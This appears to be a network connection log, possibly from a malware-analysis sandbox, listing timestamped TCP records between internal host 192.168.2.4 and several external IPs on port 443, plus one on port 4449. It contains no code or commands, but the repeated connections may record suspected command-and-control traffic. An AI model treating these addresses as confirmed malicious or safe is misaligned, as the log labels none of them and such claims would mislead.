Jul 27, 2024 08:55:00.275444031 CEST	50752	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:00.280312061 CEST	50752	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:00.280339003 CEST	443	50752	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:00.293312073 CEST	50752	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:00.293335915 CEST	443	50752	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:00.293601990 CEST	443	50752	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:00.295977116 CEST	50752	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:00.340517998 CEST	443	50752	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:01.603776932 CEST	443	50752	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:01.603864908 CEST	443	50752	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:01.606878042 CEST	50752	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:01.621820927 CEST	50752	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:01.621820927 CEST	50752	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:01.621853113 CEST	443	50752	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:01.621870995 CEST	443	50752	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:01.727009058 CEST	50754	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:01.727088928 CEST	443	50754	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:01.729384899 CEST	50754	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:01.729783058 CEST	50754	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:01.729808092 CEST	443	50754	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:01.932287931 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:01.932372093 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:01.932522058 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:01.932816029 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:01.932847023 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:02.413609982 CEST	443	50754	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:02.417612076 CEST	50754	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:02.419658899 CEST	50754	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:02.419681072 CEST	443	50754	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:02.421905994 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:02.426382065 CEST	50754	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:02.426408052 CEST	443	50754	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:02.426506996 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:02.426821947 CEST	443	50754	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:02.431107044 CEST	50754	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:02.432482004 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:02.432533026 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:02.432940960 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:02.438071966 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:02.438729048 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:02.438990116 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:02.440397978 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:02.440623999 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:02.446019888 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:02.446309090 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:02.451144934 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:02.451209068 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:02.451473951 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:02.451539040 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:02.452100039 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:02.452153921 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:02.452173948 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:02.452183008 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:02.454556942 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:02.454591990 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:02.454617977 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:02.461152077 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:02.461231947 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:02.476510048 CEST	443	50754	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:02.476749897 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:02.490741968 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:02.490814924 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:02.490845919 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:02.490870953 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:02.490894079 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:02.490911961 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:02.491276026 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:02.491307974 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:03.400433064 CEST	443	50754	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:03.400631905 CEST	443	50754	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:03.406080008 CEST	50754	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:03.422662973 CEST	50754	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:03.422702074 CEST	443	50754	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:03.422736883 CEST	50754	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:03.422751904 CEST	443	50754	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:03.539155006 CEST	50758	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:03.539235115 CEST	443	50758	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:03.541980028 CEST	50758	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:03.542460918 CEST	50758	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:03.542536020 CEST	443	50758	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:04.194787979 CEST	443	50758	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:04.197745085 CEST	50758	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:04.200036049 CEST	50758	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:04.200045109 CEST	443	50758	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:04.200160980 CEST	50758	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:04.200165987 CEST	443	50758	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:04.200448990 CEST	443	50758	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:04.202100992 CEST	50758	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:04.244570017 CEST	443	50758	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:04.694055080 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:04.694264889 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:04.704575062 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:04.706302881 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:04.740937948 CEST	50755	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:04.740998983 CEST	443	50755	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:04.853636980 CEST	50759	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:04.853677034 CEST	443	50759	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:04.853729010 CEST	50759	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:04.853996038 CEST	50759	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:04.854006052 CEST	443	50759	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:05.319803953 CEST	443	50759	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:05.322480917 CEST	50759	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:05.329133987 CEST	50759	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:05.329149961 CEST	443	50759	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:05.329643965 CEST	443	50759	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:05.331473112 CEST	50759	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:05.331492901 CEST	50759	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:05.331825018 CEST	443	50759	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:05.505583048 CEST	443	50758	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:05.505778074 CEST	443	50758	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:05.507261992 CEST	50758	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:05.521806955 CEST	50758	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:05.521872997 CEST	443	50758	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:05.521923065 CEST	50758	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:05.521941900 CEST	443	50758	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:05.633317947 CEST	50760	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:05.633400917 CEST	443	50760	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:05.634207964 CEST	50760	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:05.634639978 CEST	50760	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:05.634696960 CEST	443	50760	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:06.014507055 CEST	443	50759	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:06.014748096 CEST	443	50759	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:06.014795065 CEST	50759	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:06.020270109 CEST	50759	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:06.020297050 CEST	443	50759	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:06.020312071 CEST	50759	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:06.020318985 CEST	443	50759	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:06.245696068 CEST	443	50760	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:06.245870113 CEST	50760	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:06.248549938 CEST	50760	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:06.248575926 CEST	443	50760	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:06.248642921 CEST	50760	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:06.248656034 CEST	443	50760	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:06.248848915 CEST	50760	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:06.248873949 CEST	443	50760	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:06.249500990 CEST	443	50760	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:06.249685049 CEST	50760	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:06.296494007 CEST	443	50760	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:06.383616924 CEST	50761	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:06.383662939 CEST	443	50761	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:06.383846998 CEST	50761	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:06.384092093 CEST	50761	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:06.384118080 CEST	443	50761	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:06.541686058 CEST	4449	50739	94.156.79.190	192.168.2.4
Jul 27, 2024 08:55:06.541898966 CEST	50739	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 08:55:06.908677101 CEST	443	50761	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:06.908893108 CEST	50761	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:07.493794918 CEST	443	50760	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:07.493967056 CEST	443	50760	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:07.494040966 CEST	50760	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:07.509279966 CEST	50760	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:07.509305954 CEST	443	50760	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:07.509336948 CEST	50760	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:07.509351015 CEST	443	50760	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:07.612392902 CEST	50762	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:07.612474918 CEST	443	50762	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:07.612787008 CEST	50762	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:07.613137007 CEST	50762	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:07.613193989 CEST	443	50762	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:08.291948080 CEST	443	50762	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:08.292145014 CEST	50762	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:08.294553041 CEST	50762	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:08.294605970 CEST	443	50762	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:08.294908047 CEST	50762	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:08.294956923 CEST	443	50762	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:08.295130014 CEST	443	50762	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:08.295275927 CEST	50762	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:08.340501070 CEST	443	50762	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:09.283798933 CEST	443	50762	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:09.283904076 CEST	443	50762	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:09.284094095 CEST	50762	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:09.385215998 CEST	50762	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:09.385215998 CEST	50762	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:09.385281086 CEST	443	50762	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:09.385318995 CEST	443	50762	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:09.487459898 CEST	50763	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:09.487489939 CEST	443	50763	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:09.487564087 CEST	50763	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:09.488050938 CEST	50763	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:09.488061905 CEST	443	50763	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:09.570720911 CEST	50739	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 08:55:09.570972919 CEST	50764	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 08:55:09.575664043 CEST	4449	50739	94.156.79.190	192.168.2.4
Jul 27, 2024 08:55:09.575819969 CEST	4449	50764	94.156.79.190	192.168.2.4
Jul 27, 2024 08:55:09.575886011 CEST	50764	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 08:55:09.576244116 CEST	50764	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 08:55:09.581080914 CEST	4449	50764	94.156.79.190	192.168.2.4
Jul 27, 2024 08:55:10.107414007 CEST	443	50763	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:10.107487917 CEST	50763	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:10.110255957 CEST	50763	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:10.110261917 CEST	443	50763	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:10.110340118 CEST	50763	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:10.110373020 CEST	443	50763	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:10.110436916 CEST	50763	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:10.110440016 CEST	443	50763	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:10.110996008 CEST	443	50763	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:10.111200094 CEST	50763	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:10.152546883 CEST	443	50763	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:11.421938896 CEST	443	50763	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:11.422120094 CEST	443	50763	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:11.422177076 CEST	50763	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:11.439208031 CEST	50763	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:11.439220905 CEST	443	50763	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:11.550280094 CEST	50765	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:11.550365925 CEST	443	50765	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:11.550442934 CEST	50765	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:11.551269054 CEST	50765	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:11.551304102 CEST	443	50765	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:12.181929111 CEST	443	50765	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:12.181996107 CEST	50765	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:12.185992956 CEST	50765	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:12.185997009 CEST	443	50765	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:12.186044931 CEST	50765	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:12.186048031 CEST	443	50765	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:12.186093092 CEST	50765	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:12.186095953 CEST	443	50765	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:12.186331034 CEST	443	50765	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:12.186496019 CEST	50765	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:12.228538036 CEST	443	50765	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:13.598901033 CEST	443	50765	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:13.599087000 CEST	443	50765	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:13.599142075 CEST	50765	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:13.617259979 CEST	50765	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:13.617269993 CEST	443	50765	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:13.721664906 CEST	50768	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:13.721698046 CEST	443	50768	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:13.721760988 CEST	50768	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:13.722136974 CEST	50768	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:13.722147942 CEST	443	50768	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:14.380445004 CEST	443	50768	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:14.380609035 CEST	50768	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:14.383313894 CEST	50768	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:14.383321047 CEST	443	50768	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:14.383384943 CEST	50768	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:14.383388996 CEST	443	50768	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:14.383440971 CEST	50768	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:14.383444071 CEST	443	50768	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:14.383661032 CEST	443	50768	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:14.383796930 CEST	50768	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:14.428533077 CEST	443	50768	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:15.364655972 CEST	443	50768	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:15.364836931 CEST	443	50768	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:15.364918947 CEST	50768	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:15.380712032 CEST	50768	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:15.380728960 CEST	443	50768	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:15.380753994 CEST	50768	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:15.380758047 CEST	443	50768	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:15.487520933 CEST	50770	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:15.487611055 CEST	443	50770	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:15.487711906 CEST	50770	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:15.488219976 CEST	50770	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:15.488256931 CEST	443	50770	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:16.883866072 CEST	443	50770	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:16.883964062 CEST	50770	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:16.886132002 CEST	50770	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:16.886147022 CEST	443	50770	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:16.886203051 CEST	50770	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:16.886209011 CEST	443	50770	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:16.887059927 CEST	443	50770	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:16.887238979 CEST	50770	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:16.928502083 CEST	443	50770	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:18.135282993 CEST	443	50770	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:18.135457993 CEST	443	50770	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:18.135534048 CEST	50770	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:18.149354935 CEST	50770	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:18.149380922 CEST	443	50770	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:18.149398088 CEST	50770	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:18.149405956 CEST	443	50770	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:18.251969099 CEST	50773	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:18.251997948 CEST	443	50773	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:18.252058029 CEST	50773	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:18.252515078 CEST	50773	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:18.252532005 CEST	443	50773	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:18.869216919 CEST	443	50773	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:18.869374990 CEST	50773	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:18.871736050 CEST	50773	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:18.871763945 CEST	443	50773	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:18.871829987 CEST	50773	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:18.871841908 CEST	443	50773	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:18.872118950 CEST	443	50773	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:18.872258902 CEST	50773	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:18.912555933 CEST	443	50773	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:21.125948906 CEST	443	50773	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:21.126127005 CEST	443	50773	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:21.126207113 CEST	50773	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:21.167239904 CEST	50773	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:21.167327881 CEST	443	50773	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:21.167371988 CEST	50773	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:55:21.167392015 CEST	443	50773	107.173.160.139	192.168.2.4
Jul 27, 2024 08:55:21.283103943 CEST	50776	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:21.283186913 CEST	443	50776	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:21.283282995 CEST	50776	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:21.283684969 CEST	50776	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:21.283710003 CEST	443	50776	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:21.766501904 CEST	443	50761	172.67.213.85	192.168.2.4
Jul 27, 2024 08:55:21.766592026 CEST	50761	443	192.168.2.4	172.67.213.85
Jul 27, 2024 08:55:21.960191965 CEST	443	50776	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:21.960342884 CEST	50776	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:21.962837934 CEST	50776	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:21.962867022 CEST	443	50776	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:21.962932110 CEST	50776	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:21.962943077 CEST	443	50776	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:21.963217974 CEST	443	50776	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:21.963350058 CEST	50776	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:22.004574060 CEST	443	50776	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:22.987586021 CEST	443	50776	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:22.987763882 CEST	443	50776	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:22.987966061 CEST	50776	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:23.004045010 CEST	50776	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:23.004096031 CEST	443	50776	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:23.004131079 CEST	50776	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:55:23.004147053 CEST	443	50776	167.235.128.153	192.168.2.4
Jul 27, 2024 08:55:23.111177921 CEST	50779	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:23.111265898 CEST	443	50779	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:23.111352921 CEST	50779	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:23.111740112 CEST	50779	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:23.111774921 CEST	443	50779	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:23.699321032 CEST	443	50779	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:23.699429989 CEST	50779	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:23.701869011 CEST	50779	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:23.701896906 CEST	443	50779	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:23.701953888 CEST	50779	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:23.701965094 CEST	443	50779	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:23.702255964 CEST	443	50779	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:23.702406883 CEST	50779	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:23.702438116 CEST	443	50779	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:24.963069916 CEST	443	50779	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:24.963246107 CEST	443	50779	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:24.963335037 CEST	50779	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:24.976716995 CEST	50779	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:24.976790905 CEST	443	50779	107.173.160.137	192.168.2.4
Jul 27, 2024 08:55:24.976828098 CEST	50779	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:55:24.976846933 CEST	443	50779	107.173.160.137	192.168.2.4
